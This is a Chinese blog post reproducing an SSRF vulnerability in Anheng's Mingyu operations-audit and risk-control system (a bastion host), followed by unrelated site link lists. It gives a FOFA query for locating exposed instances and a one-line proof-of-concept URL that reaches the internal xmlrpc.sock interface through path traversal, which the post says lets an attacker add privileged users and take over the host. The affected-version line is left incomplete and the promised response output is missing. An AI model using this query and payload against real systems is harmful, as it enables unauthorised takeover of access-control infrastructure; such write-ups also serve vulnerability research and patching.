明御运维审计与风险控制系统漏洞复现

简介

明御®运维审计与风险控制系统是安恒信息在多年运维安全管理的理论和实践经验积累的基础上,采用B/S架构,集“身份认证、账户管理、控制权限、日志审计”于一体,支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询,具备全方位运维风险控制能力的统一安全管理与审计产品。

危害

明御运维审计与风险控制系统 xmlrpc.sock 接口存在SSRF漏洞,通过漏洞可以添加除超级管理员权限的其他权限用户从而控制堡垒机。

影响版本

以及之前的版本

漏洞复现

FOFA语法: "明御运维审计与风险控制系统"

POC:

/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc

直接拼接url访问返回信息如下:

相关推荐

  1. Nginx漏洞分析

    2024-02-22 23:28:02       49 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-02-22 23:28:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-02-22 23:28:02       100 阅读
  3. 在Django里面运行非项目文件

    2024-02-22 23:28:02       82 阅读
  4. Python语言-面向对象

    2024-02-22 23:28:02       91 阅读

热门阅读

  1. springboot接收base64文件并上传

    2024-02-22 23:28:02       40 阅读
  2. 【达梦数据库】查看pesg回滚段信息的视图和SQL

    2024-02-22 23:28:02       53 阅读
  3. 数学术语之源——插值(interpolation)

    2024-02-22 23:28:02       56 阅读
  4. C和C++编译器标识符

    2024-02-22 23:28:02       57 阅读
  5. MQL语言实现单元测试

    2024-02-22 23:28:02       43 阅读
  6. 机器学习系列-机器学习范式

    2024-02-22 23:28:02       42 阅读
  7. RK3568 speex speexdsp降噪算法移植

    2024-02-22 23:28:02       60 阅读
  8. windows 10 和 11 的3个杀招软件

    2024-02-22 23:28:02       64 阅读
  9. Luogu P6175 无向图的最小环问题 题解 Floyd

    2024-02-22 23:28:02       58 阅读
  10. 带你了解软件系统架构的演变

    2024-02-22 23:28:02       57 阅读
  11. jQuery的应用(二)

    2024-02-22 23:28:02       49 阅读
  12. KMP算法

    KMP算法

    2024-02-22 23:28:02      53 阅读
  13. 详解小程序配置服务器域名

    2024-02-22 23:28:02       54 阅读
  14. CSS:定位

    2024-02-22 23:28:02       54 阅读